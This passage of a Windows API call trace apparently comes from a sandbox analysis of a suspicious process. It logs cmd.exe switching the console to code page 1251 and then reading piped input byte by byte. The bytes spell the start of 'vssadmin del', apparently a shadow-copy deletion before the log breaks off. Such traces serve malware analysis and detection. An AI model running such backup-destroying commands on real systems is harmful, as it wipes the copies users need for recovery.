Ptr=0x1b843c08ee0, Size=0x1b8) returned 0x1b843c08ee0 [0292.232] GetProcessHeap () returned 0x1b843bf0000 [0292.233] RtlSizeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, MemoryPointer=0x1b843c08ee0) returned 0x1b8 [0292.233] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7dbbabb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0292.233] GetProcessHeap () returned 0x1b843bf0000 [0292.233] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xe8) returned 0x1b843bf7980 [0292.234] GetProcessHeap () returned 0x1b843bf0000 [0292.234] RtlReAllocateHeap (Heap=0x1b843bf0000, Flags=0x0, Ptr=0x1b843bf7980, Size=0x7e) returned 0x1b843bf7980 [0292.234] GetProcessHeap () returned 0x1b843bf0000 [0292.234] RtlSizeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, MemoryPointer=0x1b843bf7980) returned 0x7e [0292.235] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0292.235] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\mode.*", fInfoLevelId=0x1, lpFindFileData=0x202efded60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x202efded60) returned 0x1b843bf7a10 [0292.235] GetProcessHeap () returned 0x1b843bf0000 [0292.235] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x0, Size=0x28) returned 0x1b843bf64e0 [0292.235] FindClose (in: hFindFile=0x1b843bf7a10 | out: hFindFile=0x1b843bf7a10) returned 1 [0292.236] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\mode.COM", fInfoLevelId=0x1, lpFindFileData=0x202efded60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x202efded60) returned 0x1b843bf6510 [0292.236] GetProcessHeap () returned 0x1b843bf0000 [0292.236] RtlReAllocateHeap (Heap=0x1b843bf0000, Flags=0x0, Ptr=0x1b843bf64e0, Size=0x8) returned 0x1b843bf64e0 [0292.236] FindClose (in: hFindFile=0x1b843bf6510 | out: hFindFile=0x1b843bf6510) returned 1 [0292.236] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1 [0292.236] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2 [0292.236] ??_V@YAXPEAX@Z () returned 0x1 [0292.236] GetConsoleTitleW (in: lpConsoleTitle=0x202efdf2e0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0292.563] GetProcessHeap () returned 0x1b843bf0000 [0292.563] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x21c) returned 0x1b843c090b0 [0292.563] GetConsoleTitleW (in: lpConsoleTitle=0x1b843c090c0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0292.582] GetProcessHeap () returned 0x1b843bf0000 [0292.582] RtlReAllocateHeap (Heap=0x1b843bf0000, Flags=0x0, Ptr=0x1b843c090b0, Size=0x8c) returned 0x1b843c090b0 [0292.582] GetProcessHeap () returned 0x1b843bf0000 [0292.582] RtlSizeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, MemoryPointer=0x1b843c090b0) returned 0x8c [0292.582] SetConsoleTitleW (lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe - mode con cp select=1251") returned 1 [0292.602] GetProcessHeap () returned 0x1b843bf0000 [0292.603] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843c090b0) returned 1 [0292.603] InitializeProcThreadAttributeList (in: lpAttributeList=0x202efdf200, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x202efdf0f0 | out: lpAttributeList=0x202efdf200, lpSize=0x202efdf0f0) returned 1 [0292.603] UpdateProcThreadAttribute (in: lpAttributeList=0x202efdf200, dwFlags=0x0, Attribute=0x60001, lpValue=0x202efdf0dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x202efdf200, lpPreviousValue=0x0) returned 1 [0292.603] GetStartupInfoW (in: lpStartupInfo=0x202efdf190 | out: lpStartupInfo=0x202efdf190*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\WINDOWS\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254)) [0292.603] GetProcessHeap () returned 0x1b843bf0000 [0292.603] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x20) returned 0x1b843bf6510 [0292.603] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0292.603] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0292.603] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0292.603] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0292.603] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0292.603] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0292.603] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0292.603] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0292.603] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0292.603] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0292.603] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0292.603] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0292.604] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0292.605] GetProcessHeap () returned 0x1b843bf0000 [0292.605] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf6510) returned 1 [0292.605] GetProcessHeap () returned 0x1b843bf0000 [0292.605] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0x12) returned 0x1b843bf6510 [0292.605] _get_osfhandle (_FileHandle=1) returned 0x254 [0292.605] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0292.605] _get_osfhandle (_FileHandle=0) returned 0x248 [0292.605] SetConsoleMode (hConsoleHandle=0x248, dwMode=0x0) returned 0 [0292.605] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\mode.com", lpCommandLine="mode con cp select=1251", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\WINDOWS\\system32", lpStartupInfo=0x202efdf120*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="mode con cp select=1251", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x202efdf0f8 | out: lpCommandLine="mode con cp select=1251", lpProcessInformation=0x202efdf0f8*(hProcess=0x9c, hThread=0x98, dwProcessId=0xe70, dwThreadId=0xe74)) returned 1 [0292.740] CloseHandle (hObject=0x98) returned 1 [0292.740] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0292.740] GetProcessHeap () returned 0x1b843bf0000 [0292.741] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf6570) returned 1 [0292.741] GetEnvironmentStringsW () returned 0x1b843bf6530* [0292.741] GetProcessHeap () returned 0x1b843bf0000 [0292.741] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xafe) returned 0x1b843c09460 [0292.741] FreeEnvironmentStringsA (penv="=") returned 1 [0292.741] LoadLibraryExW (lpLibFileName="NTDLL.DLL", hFile=0x0, dwFlags=0x0) returned 0x7ffb3ceb0000 [0292.741] GetProcAddress (hModule=0x7ffb3ceb0000, lpProcName="NtQueryInformationProcess") returned 0x7ffb3cf556b0 [0292.741] NtQueryInformationProcess (in: ProcessHandle=0x9c, ProcessInformationClass=0x0, ProcessInformation=0x202efde5f8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x202efde5f8, ReturnLength=0x0) returned 0x0 [0292.741] ReadProcessMemory (in: hProcess=0x9c, lpBaseAddress=0x5175304000, lpBuffer=0x202efde630, nSize=0x7a0, lpNumberOfBytesRead=0x202efde5f0 | out: lpBuffer=0x202efde630*, lpNumberOfBytesRead=0x202efde5f0*=0x7a0) returned 1 [0293.157] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0305.903] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x202efdf078 | out: lpExitCode=0x202efdf078*=0x0) returned 1 [0305.904] CloseHandle (hObject=0x9c) returned 1 [0305.904] _vsnwprintf (in: _Buffer=0x202efdf248, _BufferCount=0x13, _Format="%08X", _ArgList=0x202efdf088 | out: _Buffer="00000000") returned 8 [0305.904] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0305.904] GetProcessHeap () returned 0x1b843bf0000 [0305.904] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843c09460) returned 1 [0305.905] GetEnvironmentStringsW () returned 0x1b843c09460* [0305.905] GetProcessHeap () returned 0x1b843bf0000 [0305.905] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xb24) returned 0x1b843c09f90 [0305.906] FreeEnvironmentStringsA (penv="=") returned 1 [0305.906] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0305.906] GetProcessHeap () returned 0x1b843bf0000 [0305.906] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843c09f90) returned 1 [0305.906] GetEnvironmentStringsW () returned 0x1b843c09460* [0305.906] GetProcessHeap () returned 0x1b843bf0000 [0305.906] RtlAllocateHeap (HeapHandle=0x1b843bf0000, Flags=0x8, Size=0xb24) returned 0x1b843c09f90 [0305.906] FreeEnvironmentStringsA (penv="=") returned 1 [0305.906] GetProcessHeap () returned 0x1b843bf0000 [0305.906] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf6510) returned 1 [0305.906] DeleteProcThreadAttributeList (in: lpAttributeList=0x202efdf200 | out: lpAttributeList=0x202efdf200) [0305.906] SetConsoleTitleW (lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0306.138] ??_V@YAXPEAX@Z () returned 0x1 [0306.138] _get_osfhandle (_FileHandle=1) returned 0x254 [0306.138] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0306.138] _get_osfhandle (_FileHandle=1) returned 0x254 [0306.138] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff7dbbafc08 | out: lpMode=0x7ff7dbbafc08) returned 0 [0306.138] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.138] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff7dbbafc0c | out: lpMode=0x7ff7dbbafc0c) returned 0 [0306.139] GetConsoleOutputCP () returned 0x4e3 [0306.407] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x7ff7dbbafbb0 | out: lpCPInfo=0x7ff7dbbafbb0) returned 1 [0306.407] SetThreadUILanguage (LangId=0x0) returned 0x409 [0306.869] GetProcessHeap () returned 0x1b843bf0000 [0306.869] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf7980) returned 1 [0306.869] GetProcessHeap () returned 0x1b843bf0000 [0306.869] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843c08ee0) returned 1 [0306.869] GetProcessHeap () returned 0x1b843bf0000 [0306.869] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf77c0) returned 1 [0306.869] GetProcessHeap () returned 0x1b843bf0000 [0306.869] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843c08e80) returned 1 [0306.869] GetProcessHeap () returned 0x1b843bf0000 [0306.869] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf6490) returned 1 [0306.869] GetProcessHeap () returned 0x1b843bf0000 [0306.869] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf8e90) returned 1 [0306.869] GetProcessHeap () returned 0x1b843bf0000 [0306.869] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf7610) returned 1 [0306.870] GetProcessHeap () returned 0x1b843bf0000 [0306.870] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf75e0) returned 1 [0306.870] GetProcessHeap () returned 0x1b843bf0000 [0306.870] RtlFreeHeap (HeapHandle=0x1b843bf0000, Flags=0x0, BaseAddress=0x1b843bf7340) returned 1 [0306.870] _vsnwprintf (in: _Buffer=0x7ff7dbbb7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x202efdf628 | out: _Buffer="\r\n") returned 2 [0306.870] _get_osfhandle (_FileHandle=1) returned 0x254 [0306.870] GetFileType (hFile=0x254) returned 0x3 [0306.870] _get_osfhandle (_FileHandle=1) returned 0x254 [0306.870] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0306.870] WriteFile (in: hFile=0x254, lpBuffer=0x7ff7dbba9970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x202efdf5f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesWritten=0x202efdf5f8*=0x2, lpOverlapped=0x0) returned 1 [0306.870] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff7dbbabb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0306.870] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1b843dc0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0306.871] _vsnwprintf (in: _Buffer=0x1b843dd0060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x202efdf638 | out: _Buffer="C:\\WINDOWS\\system32") returned 19 [0306.871] _vsnwprintf (in: _Buffer=0x1b843dd0086, _BufferCount=0x83d2, _Format="%c", _ArgList=0x202efdf638 | out: _Buffer=">") returned 1 [0306.871] _get_osfhandle (_FileHandle=1) returned 0x254 [0306.871] GetFileType (hFile=0x254) returned 0x3 [0306.871] _get_osfhandle (_FileHandle=1) returned 0x254 [0306.871] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\WINDOWS\\system32>", cchWideChar=-1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\WINDOWS\\system32>", lpUsedDefaultChar=0x0) returned 21 [0306.871] WriteFile (in: hFile=0x254, lpBuffer=0x7ff7dbba9970*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x202efdf628, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesWritten=0x202efdf628*=0x14, lpOverlapped=0x0) returned 1 [0306.871] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.871] GetFileType (hFile=0x248) returned 0x3 [0306.871] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.871] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.872] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.872] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c30, cchWideChar=1 | out: lpWideCharStr="vode con cp select=1251\n") returned 1 [0306.872] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.872] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.872] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.872] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c32, cchWideChar=1 | out: lpWideCharStr="sde con cp select=1251\n") returned 1 [0306.872] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.872] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.872] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.872] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c34, cchWideChar=1 | out: lpWideCharStr="se con cp select=1251\n") returned 1 [0306.872] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.873] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.873] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.873] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c36, cchWideChar=1 | out: lpWideCharStr="a con cp select=1251\n") returned 1 [0306.873] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.873] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.873] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.873] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c38, cchWideChar=1 | out: lpWideCharStr="dcon cp select=1251\n") returned 1 [0306.873] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.873] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.873] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.873] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c3a, cchWideChar=1 | out: lpWideCharStr="mon cp select=1251\n") returned 1 [0306.873] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.873] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.873] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.874] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c3c, cchWideChar=1 | out: lpWideCharStr="in cp select=1251\n") returned 1 [0306.874] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.874] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.874] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.874] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c3e, cchWideChar=1 | out: lpWideCharStr="n cp select=1251\n") returned 1 [0306.874] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.874] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.874] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.874] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c40, cchWideChar=1 | out: lpWideCharStr=" cp select=1251\n") returned 1 [0306.874] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.874] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.874] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.875] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c42, cchWideChar=1 | out: lpWideCharStr="dp select=1251\n") returned 1 [0306.875] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.875] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.875] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.875] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c44, cchWideChar=1 | out: lpWideCharStr="e select=1251\n") returned 1 [0306.875] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.875] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.875] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.875] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x7ff7dbba9970, cbMultiByte=1, lpWideCharStr=0x7ff7dbbb3c46, cchWideChar=1 | out: lpWideCharStr="lselect=1251\n") returned 1 [0306.875] _get_osfhandle (_FileHandle=0) returned 0x248 [0306.875] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0306.875] ReadFile (in: hFile=0x248, lpBuffer=0x7ff7dbba9970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x202efdf988, lpOverlapped=0x0 | out: lpBuffer=0x7ff7dbba9970*, lpNumberOfBytesRead=0x202efdf988*=0x1, lpOverlapped=0x0) returned 1 [0306.875] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, 